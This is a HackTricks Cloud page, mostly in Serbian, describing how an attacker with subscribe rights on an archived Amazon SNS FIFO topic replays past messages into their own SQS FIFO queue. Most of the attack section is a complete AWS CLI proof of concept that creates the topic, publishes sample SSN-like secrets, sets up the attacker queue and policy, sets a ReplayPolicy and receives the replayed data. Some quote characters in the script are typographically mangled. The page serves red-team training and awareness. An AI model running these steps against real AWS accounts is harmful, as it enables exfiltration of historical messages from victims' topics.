HackTricks CloudSNS FIFO Archive Replay Exfiltration via Attacker SQS FIFO Subscription
Tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Zloupotreba arhiviranja poruka na Amazon SNS FIFO topic-u za replay i exfiltrate prethodno objavljenih poruka na attacker-controlled SQS FIFO queue podešavanjem ReplayPolicy na subscription.
- Servis: Amazon SNS (FIFO topics) + Amazon SQS (FIFO queues)
- Zahtevi: Topic mora imati omogućen ArchivePolicy (message archiving). Attacker može Subscribe-ovati na topic i postaviti atribute na svoju subscription. Attacker kontroliše SQS FIFO queue i dozvoljava topic-u da šalje poruke.
- Uticaj: Istorijske poruke (objavljene pre subscription) mogu biti isporučene attacker endpoint-u. Replayed deliveries su označene sa Replayed=true u SNS envelope-u.
Preduslovi
- SNS FIFO topic sa omogućenim arhiviranjem:
ArchivePolicy(npr.{ "MessageRetentionPeriod": "2" }za 2 dana). - Attacker ima dozvole za:
sns:Subscribena ciljnom topic-u.sns:SetSubscriptionAttributesna kreiranoj subscription-i.- Attacker ima SQS FIFO queue i može da priloži queue policy koji omogućava
sns:SendMessagesa topic ARN-a.
Minimalne IAM dozvole
- Na topic-u:
sns:Subscribe. - Na subscription-u:
sns:SetSubscriptionAttributes. - Na queue-u:
sqs:SetQueueAttributesza policy, i queue policy koja dozvoljavasns:SendMessagesa topic ARN-a.
Napad: Replay arhiviranih poruka na attacker SQS FIFO
Attacker subscribe-uje svoj SQS FIFO queue na victim SNS FIFO topic, zatim podešava ReplayPolicy na timestamp iz prošlosti (u okviru vremenskog perioda zadržavanja arhive). SNS odmah replay-uje odgovarajuće arhivirane poruke na novu subscription i označava ih sa Replayed=true.
Notes:
- Timestamp koji se koristi u
ReplayPolicymora biti >= topic-ovogBeginningArchiveTime. Ako je raniji, API vraćaInvalid StartingPoint value. - Za SNS FIFO
Publish, morate navestiMessageGroupId(i ili dedup ID ili omogućitiContentBasedDeduplication).
End-to-end CLI POC (us-east-1)
```bash REGION=us-east-1 # Compute a starting point; adjust later to >= BeginningArchiveTime if needed TS_START=$(python3 - << 'PY' from datetime import datetime, timezone, timedelta print((datetime.now(timezone.utc) - timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%SZ')) PY )1) Create SNS FIFO topic with archiving (2-day retention)
TOPIC_NAME=htreplay$(date +%s).fifo
TOPIC_ARN=$(aws sns create-topic –region “$REGION”
–cli-input-json ‘{“Name”:“’”$TOPIC_NAME“‘“,“Attributes”:{“FifoTopic”:“true”,“ContentBasedDeduplication”:“true”,“ArchivePolicy”:“{"MessageRetentionPeriod":"2"}”}}’
–query TopicArn –output text)
echo “Topic: $TOPIC_ARN”
2) Publish a few messages BEFORE subscribing (FIFO requires MessageGroupId)
for i in $(seq 1 3); do
aws sns publish –region “$REGION” –topic-arn “$TOPIC_ARN”
–message “{"orderId":$i,"secret":"ssn-123-45-678$i"}”
–message-group-id g1 >/dev/null
done
3) Create attacker SQS FIFO queue and allow only this topic to send
Q_URL=$(aws sqs create-queue –queue-name ht-replay-exfil-q-$(date +%s).fifo
–attributes FifoQueue=true –region “$REGION” –query QueueUrl –output text)
Q_ARN=$(aws sqs get-queue-attributes –queue-url “$Q_URL” –region “$REGION”
–attribute-names QueueArn –query Attributes.QueueArn –output text)
cat > /tmp/ht-replay-sqs-policy.json <<JSON {“Version”:“2012-10-17”,“Statement”:[{“Sid”:“AllowSNSSend”,“Effect”:“Allow”,“Principal”:{“Service”:“sns.amazonaws.com”},“Action”:“sqs:SendMessage”,“Resource”:“$Q_ARN”,“Condition”:{“ArnEquals”:{“aws:SourceArn”:“$TOPIC_ARN”}}}]} JSON
Use CLI input JSON to avoid quoting issues
aws sqs set-queue-attributes –region “$REGION” –cli-input-json “$(python3 - << ‘PY’ import json, os print(json.dumps({ ‘QueueUrl’: os.environ[‘Q_URL’], ‘Attributes’: {‘Policy’: open(‘/tmp/ht-replay-sqs-policy.json’).read()} })) PY )”
4) Subscribe the queue to the topic
SUB_ARN=$(aws sns subscribe –region “$REGION” –topic-arn “$TOPIC_ARN”
–protocol sqs –notification-endpoint “$Q_ARN” –query SubscriptionArn –output text)
echo “Subscription: $SUB_ARN”
5) Ensure StartingPoint is >= BeginningArchiveTime
BEGIN=$(aws sns get-topic-attributes –region “$REGION” –topic-arn “$TOPIC_ARN” –query Attributes.BeginningArchiveTime –output text) START=${TS_START} if [ -n “$BEGIN” ]; then START=“$BEGIN”; fi
aws sns set-subscription-attributes –region “$REGION” –subscription-arn “$SUB_ARN”
–attribute-name ReplayPolicy
–attribute-value “{"PointType":"Timestamp","StartingPoint":"$START"}”
6) Receive replayed messages (note Replayed=true in the SNS envelope)
aws sqs receive-message –queue-url “$Q_URL” –region “$REGION”
–max-number-of-messages 10 –wait-time-seconds 10
–message-attribute-names All –attribute-names All
</details>
## Uticaj
**Potencijalni uticaj**: Napadač koji može да се претплати на SNS FIFO topic са омогућеним архивирањем и да подеси `ReplayPolicy` на својој претплати може одмах да изврши replay и exfiltrate историјске поруке објављене на тој topic, не само поруке послате након креирања претплате. Достављене поруке укључују `Replayed=true` заставицу у SNS envelope.
> [!TIP]
> Učite i vežbajte AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Učite i vežbajte GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Učite i vežbajte Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Podržite HackTricks</summary>
>
> - Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)!
> - **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili **pratite** nas na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Podelite hakerske trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
>
> </details>